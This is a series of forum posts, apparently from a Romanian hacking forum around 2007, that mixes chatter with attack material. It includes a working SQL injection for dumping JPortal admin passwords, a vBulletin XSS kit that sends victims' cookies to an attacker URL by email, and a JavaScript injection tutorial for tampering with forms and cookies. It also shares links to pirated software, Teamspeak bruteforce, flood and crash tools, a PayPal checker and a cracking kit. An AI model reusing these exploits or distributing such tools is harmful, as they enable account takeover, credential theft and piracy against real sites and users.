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  1. Nici la mine nu merge. Astept ... Loading file info. Please wait... Dupaia imi apare Dowlowad File si dau click si imi apare din nou aia cu Loading File... Face o chestie ca si cum as da refresh la pagina. EDIT Asteptam un upload pe rs nenea zbeng daca se poate
  2. Ras

    JPortal Bug

    This will help you to get admin from webs who are powered from jportal... Example the web is: http://www.example.com/[here-you-put-the-bug] The bug is: print.php?what=article&id=X AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1 It will show you admin password.
  3. Kerio Personal Firewall is the Windows IT Pro Readers’ Choice Award winner for best desktop firewall! It was also the least expensive firewall among the top three contenders, proving that affordability doesn’t have to compromise quality. SPF4 offers the hacker-proof security of a leading firewall for half the cost of the competition. Two-way firewall keeps hackers out and private info secure! Turns your PC invisible online! Link: http://rapidshare.com/files/21931453/Sunbelt.Kerio.Personal.Firewall.v4.3.635.0.rar
  4. => Xss Vbulletin 3.5.x ( test: 3.5.4 ) _________________________________________________________________________ ( 1 ) -------------------------------------------------------------------- Name file: exploit.php -------------------------------------------------------------------- <?php $ip_adresse = $_SERVER['REMOTE_ADDR']; if(!empty($ip_adresse)) { echo 'il tuo ip ?: ',$ip_adresse; } else { echo 'Impossible d\'afficher l\'IP'; } ?> [url="log.php"][/url]<? $xx1=$HTTP_SERVER_VARS['SERVER_PORT']; $day = date("d",time()); $month = date("m",time()); $year = date("Y",time()); if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR; else $visitor_info = $REMOTE_HOST; $base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF; $x1=`host $REMOTE_ADDR|grep Name`; $x2=$REMOTE_PORT; ?> <?php $cookie = $_GET['c']; ?> <?php $myemail = "YOUR ADDRESS E-MAIL"; $today = date("l, F j, Y, g:i a"); $subject = "Xss Vbulletin"; $message = "Xss: Hacking Ip: $ip_adresse Cookie: $cookie Url: $base porta usata: $xx1 remote port: $x2 Giorno & Ora : $today \n "; $from = "From: $myemail\r\n"; mail($myemail, $subject, $message, $from); ?> -------------------------------------------------------------------- <?php $myemail = "YOUR ADDRESS E-MAIL"; -------------------------------------------------------------------- ( 2 ) -------------------------------------------------------------------- Name file: image.gif -------------------------------------------------------------------- <pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.cookie' b='</pre' > -------------------------------------------------------------------- location="http://YOUR ADDRESS WEB.com -------------------------------------------------------------------- ( 3 ) -------------------------------------------------------------------- Like Using -------------------------------------------------------------------- 1° new thread 2° [url="http://YOUR ADDRESS WEB.com/IMAGE.GIF"]BEAUTIFUL GIRL[/url] ' 3° Submit 4° It waits for -------------------------------------------------------------------- Content: 1.image.gif 2.exploit.php How to: 1.Edit exploit.php, find "mail@mail.com" and replace with ur mail. 2.Then upload in a server if u have a site, note the link.(any free site with php is enough) 3.Open the image.gif in a text editor and replace the "http://something.com/exploit.php" with urs. 4.Put the image.gif in a vBulletin form and wen the user click that, gif redirects to exploit.php, this collects the cookie and u will get a mail.
  5. fii atent...intrii pe linku ala ( http://rapidshare.com/files/19518737/NetBios.rar ) si iti apar 2 coloane ( Premium SI Free ) si chiar jos in coloana cu free e un buton "Free" dai click pe ala si o sa iti apara o fereastra si ii dai Save.
  6. TrojanHunter searches for and removes trojans from your system. With an easy-to-use Scanner and a Guard that scans in the background TrojanHunter is a must-have complement to your virus scanner. If you are downloading files from the Internet, you need TrojanHunter! Features: * High-speed file scan engine capable of detecting modified trojans * Memory scanning for detecting any modified variant of a particular build of a trojan * Registry scanning for detecting traces of trojans in the registry * Inifile scanning for detecting traces of trojans in configuration files * Port scanning for detecting open trojan ports * The Advanced Trojan Analyzer, an exclusive feature of TrojanHunter, is able to find whole classes of trojans using advanced scanning techniques * TrojanHunter Guard for resident memory scanning - detect any trojans if they manage to start up * LiveUpdate utility for effortless ruleset updating via the Internet * Process list giving details about every running process on the system, including the path to the actual executable file * Accurate removal of all detected trojans - even if they are running or if the trojan has injected itself into another process * Built-in netstat viewer * Extensive help files * Free technical support via e-mail Link: http://rapidshare.com/files/21674481/Trojan_Hunter_v4.5.rar
  7. Ras

    Alt Keylogger

    nici eu nu stiu c++ dar iti zic asa... tu ai pus codul, dar butoane si boxuri ai facut? nu cred ca se fac automat. te intreb asta pt ca ai zis ca iti apare o fereastra gri. EDIT daca am gresit cu ceva corectati-ma!
  8. This Tutorial is for informational purposes only and i have no responsibility if anyone uses it for illegal purposes. Using JavaScript Injection the user can alter things in a website without having to leave it or save the page in his PC.This is done using the address bar from his browser. The syntax of the commands looks like this: javascrit:alert(#command#) For example if you want to see an alert inside the http://www.example.com site,type the URL in the adress bar and when the page loads,delete the URL and type javascrit:alert("Hello World") as a new URL.This way an alert will show up saying Hello World. However, with this technique someone can alter almost everything in a page.For example an image.Lets suppose that there is an image with the site's logo.By viewing the source of the page (This can be done by going to View-Source) we find this piece of HTML code: So there is an image named "hi" and the source of it is "hello.gif".We want to change this to bye.jpeg that is stored on our site http://www.mysite.com So the full URL of our image is http://www.mysite.com/bye.jpeg Using JavaScript Injection we type in the adress bar: javascript:alert(document.hi.src="http://www.mysite.com/bye.jpeg") You will see an alert saying http://www.mysite.com/bye.jpeg and after that the image will be changed.Notice though that those changes are temporary!If you refresh the page or enter it again your changes will be lost,because you dont alter the site in the server but in your PC. Using the same way we can view or change the value of variables.For example we find this piece of code in the site's source: <SCRIPT LANGUAGE="JavaScript"> var a="test" </SCRIPT> This means that the variable with the name a has the value "test".In order to view the value of the variable we would type: javascript:alert(a) and in order to change it from test to hello: javascript:alert(a="hello") However Javascript Injection is mostly used in changing form's attributes.Thats the piece of code we have: <form name="format" action="send.php" method="post"> <input type="hidden" name="mail" value="someone@somewhere.com"> <input type="text" name="name"> <input type="submit" value="submit"></form> We want the form to be sent to our mailbox and not to someone@somewhere.com This can be done by this command: javascript:alert(document.format.mail.value="me@hacker.com") As you have noticed by now we always use a hierarchy in the items we edit: We start from the bigger to the smaller: 1)We started with document 2)we typed the name of the object we wanted to alter (for example document.hi.src) or the item in which it belonged and then the name of it (for example document.format.mail.value) 3)Lastly we ended in the attribute of the item we wanted to change (for example its source: document.hi.src, or its value: document.format.mail.value) 4)We separated the words using dots (.) 5)When we wanted to change an attribute we used the equal sign (=) and the new attribute. *NOTE:We use "" when the new attribute is a character string (for example: document.format.mail.value="me@hacker.com") If we wanted it to be the value of a variable we wouldnt used the "".For example we want to change the variable a's value to the value of variable b.We would type javascript:alert(a= However most items in a page have no name.For example: <form action="send.php" method="post"> <input type="hidden" name="mail" value="someone@somewhere.com"> <input type="text" name="name"> <input type="submit" value="submit"></form> In this code the form's name is missing.Using all the above, the command would look like this: javascript:alert(document. .mail.value="me@hacker.com") In this case we will have to count all the forms to find out the form's number.I will use an example: <form action="send.php" method="post"> <input type="text" name="name"> <input type="submit" value="submit"></form> <form action="send.php" method="post"> <input type="hidden" name="mail" value="someone@somewhere.com"> <input type="text" name="name"> <input type="submit" value="submit"></form> <form action="send.php" method="post"> <input type="text" name="name"> <input type="submit" value="submit"></form> In this code we see 3 forms,but the one we are interested in is the second.So the number of the form we want is 2. We must not forget that we start counting from number 1.We say 1,2,3,4... However in JavaScript the counting starts from number 0.it goes 0,1,2,3 etc So the actual number of the form is number 1 not 2.In general find the number of the form and take out one (number-1). We will use this number to fill in the gap in our command: javascript:alert(document.forms[1].mail.value="me@hacker.com") Like this you can change images or links that have no name.To do that just change "forms" to the type of item you want to change: For Images it would be javascript:alert(document.images[3].src="#the url of the picture you want#") For links it would be javascript:alert(document.links[0].href="http://www.undug.net/#the url you want#") Lastly,we can use this technique to edit cookies. The command is the following and was written by Dr_aMado from triviasecurity.net,but i altered it a bit so that it shows the cookie before the user edits it. Just copy-paste this line to the adress bar: javascript:alert(window.c=function a(n,v,nv){c=document.cookie;c=c.substring(c.indexOf(n)+n.length,c.length);c=c.substring(1,((c.indexOf(";")>-1) ? c.indexOf(";") : c.length));nc=unescape©.replace(v,nv);document.cookie=n+"="+escape(nc);return unescape(document.cookie);});alert('The cookie is: "'+document.cookie+'"');alert(c(prompt("The name of the cookie:",""),prompt("Change this value:",""),prompt("with this:",""))); As a conclusion,i must stress that the changes are made only on the user's side!It's like saving the site in your PC and then modifying it.However, using this technique you can trick a page (for example with cookies) or pass the reference security of a page.For example some pages check from where the user sends the data.Specifficaly if the data from http://www.test.com/form.php was sent to http://www.test.com/check.php, check.php possibly would check if the data was sent from the form in http://www.test.com/form.php Except for that,if you manage to enter your own JavaScript code in a page, using something like this technique you will be able to alter pictures and staff like that permanently!However you need further knowledge than the one which is provided here.
  9. Ras

    File Hosting

    100% Free Unlimited Disk Space Up to 100MB per File No Sign Up Required Link: http://www.mediafire.com/
  10. Kaspersky Internet Security 6.0 is a fully integrated solution that protects your computer from all of the most common Internet threats, including viruses, hacker attacks, adware, spam and spyware. Link: http://rapidshare.com/files/21527870/Kaspersky_Internet_Security_v6.0.2.614.rar
  11. Sygate mi s-a parut cel mai bun firewall pe care l-am folosit...nu prea am avut eu firewall dar asta m-a multumit. Link: http://rapidshare.com/files/21320812/SyGate_Professional_Firewall_5.5.rar
  12. Teamspeak Admin Tools: TS Admin Client 1.1 TS Telnet Tool 0.9 TTT 1.3 TS Multitool 2.2 + TS Multitool 2.4 Teamspeak All-In-Ones: TeamSpeak Chaos 1.0 Teamspeak Hack 1.0 TS_Tool Teamspeak Bruteforcer/Dictionary Attacker n0x's Teamspeak Bruter Hydra - win32 compiled + HydraGUIBeta + HydraGUI 1.0 Teamspeak Flooder: Channel Flooder 1.0 Free-Hack - blubablub - EasyFlooder 1.0 - 1.3 Free-Hack - FrEe - TS Flooder Teamspeak Player Bot TeamSpeak-Spam TS1 ~censored~ tspeakfp + 1.bat = Teamspeak Server Crash Teamspeak Spammer: -Message Spammer Message Spammer Teamspeak Message Spammer 1.1 Teamspeak Spammer 1.0 TS_Text_Flooder_Err0r411 TSColorMessageSpammer -Status Spammer Auto Operator Spammer Auto Voice Spammer Channel Admin Spammer Operator Spammer Sever Admin Spammer Status Spammer 1.0 Status Spammer Status_Spammer TS Injection -Remade- TS_Spam TsLagger Voice Spammer Teamspeak Scripts: -Perl TeamSpeak 2 Anti-Flood Daemon TS2PerlMod GNUGPL-Edition -PHP ACTSViewer CyTS Class gllcTS2 WebPost2 libacts2 Library PHPTS2 TeamSpeak 2 Banner Dispatcher TeamSpeak 2 Status Module for Joomla! TeamSpeak 2 Webmanager TeamSpeak Display -Miscellaneous ASP WebPost2 Usefull Tools: TS2PerlMod Configurator ts_allinone-1.0 TS Autokick TS Background Changer TS Chatter TS Display I.P. Ban List Check TS Logitech G15 TS OnTop TS PacketMod TS Peak TS Remote Gui TS Resolver TS Server dbs SoundBoardMaker Teamjoin TeamSpeaker Voice Overlay Volume TSMate TS2 Annoyer TS Find SA Teamspeak Videotutorials: Change Operating System + Change TS Color How To Use Hydra Invisible User on Teamspeak TS Overtake Free-Hack.com Specials: Free-Hack Client Invisible Client CA - Kick from Server Client Link: http://rapidshare.com/files/21318831/Teamspeak.Toolz.FrEe-hAcK.comVol3.rar Pass: free-hack.com
  13. le-am luat si eu de undeva ) acolo sunt...si aici nu le pune nimeni cu toate ca am vazut cativa useri de aici si acolo.
  14. Aceasta este sursa de PayPal Checker facuta de .GM, a facut-o publica. Este in Visual Basic. Link: http://rapidshare.com/files/21311825/PP-Source.zip Bafta!
  15. UNLIMITED download/upload Its very easy to fool RapidShare server if your IP address is assigned by your ISP. Just follow these simple steps: Clean up IE or netscape or Firefox cookie( In this case the one that belong to rapidshare website) On Command prompt (open MS-DOS) type -----> ipconfig /flushdns <---Enter type -----> ipconfig /release <---Enter type -----> ipconfig /renew <---Enter type -----> exit <--------Enter Or save these commands in a bat file and run it everytime you need to fool Rapidshare server. Remember to clean up rapidshare cookie in your temp Internet files folder. Now you should be ready to download/upload as many files as you want from their server.
  16. A new Crackers Kit is out, 2007 Edition. New UI for advance user and noobs. Hope everyone gets some kind of use out of it...Crackers Kit 2007 edition includes the following apps to crack most of what u wish..Smile OllyDbgr OllyShadow W32Dasm Peid RDG Dede Evacleaner Filemon HashCalc RSAtool ProcessExp RegMon ResHacker XNresedit Abel Apatch Codefusion dUP Pmaker TolasPe UPP EzPatch KGMaker ImpRec LordPe Link: http://rapidshare.com/files/21309546/Crackers_Kit_2007.zip
  17. Acest program va instaleaza toate ocx-urile si dll-urile pt windows... Trebuie sa ii dati install in system32. Link: http://rapidshare.com/files/20469233/libraryfiles.exe
  18. Pai eu daca mint pot sa ies dintr-o incurcatura . Si nu imi place sa fiu mintit pt ca aflu de la (de ex: Andrei) ca (de ex: Mihai) m-a mintit...si eu l-am crezut pe Mihai. Dar cum se spune "Minciuna nu are picioare lungi". Poate mai scapi vreodata dar nu mereu:). Oricum nu e bine sa mintim(eu mint acum).
  19. Ras

    Ce viteza ai ?

    6657 downlowad 2345 upload
  20. Intra in VB si creeaza un proiect nou. Adauga Winsock Control (apesti CTRL + T si bifezi Winsock Control). Creeaza 2 textboxes, 2 buttons, 1 timer, 1 listbox, 1 winsock Primul textbox este pt IP, al doilea textbox pt port, primul buton pt start, al doilea pt stop. Pune timerul False si pune intervalu 10 sau chiar 1(daca pui 1 are viteza mai mare). In primul buton scrii: Private Sub Command1_Click() Winsock1.RemoteHost = Text1.Text Winsock1.RemotePort = Text2.Text Winsock1.Connect Timer1.Enabled = True End Sub In timer scrii: Private Sub Timer1_Timer() Winsock1.Close Text2.Text = Int(Text2.Text) + 1 Winsock1.RemoteHost = Text1.Text Winsock1.RemotePort = Text2.Text Winsock1.Connect End Sub In winsock scrii: Private Sub Winsock1_Connect() List1.AddItem "Port " & Winsock1.RemotePort & " is having a yard sale." End Sub In al doilea buton scrii: Private Sub Command2_Click() Timer1.Enabled = False Winsock1.Close End Sub This is all! Bafta!
  21. Shows how to use Super Scan to Hack Netbios opened on remote PC (Port 139) Link: http://rapidshare.com/files/19518737/NetBios.rar vedeti ca aveti acolo si programul superscan....
  22. Ai incercat? Incearca si poate merge.
  23. http://www.englezaonline.ro/ Cursuri de limba engleza online, invata pronuntia cu lectii audio si dictionar, fara profesor
  24. Am avut si firewallul asta...nu prea m-a multumit Mi-a placut cel mai mult Sygate.
  25. Link: http://developer.yahoo.com/yui/theater/ Aveti acolo niste cursuri video : Douglas Crockford — "The JavaScript Programming Language" Douglas Crockford — "Advanced JavaScript" Todd Kloots — "The YUI Menu Control" Joe Hewitt — "Welcome to Firebug 1.0" Implementation Focus — "OurStory.com" Matt Sweeney — "Web 2.0: Getting It Right the Second Time" Iain Lamb — "The New Hacker's Toolkit" Douglas Crockford — "An Inconvenient API: The Theory of the DOM" Lars Knoll and George Staikos: "From KHTML to Webkit" Jon Chambers — "Screencast: Thinkature Co-founder on Developing with YUI" Lars Knoll and George Staikos: "From KHTML to Webkit" Mi s-a parut interesant acest link...pt ca au cursuri video de javascript, iar eu nu stiu javascript si vreau sa invat
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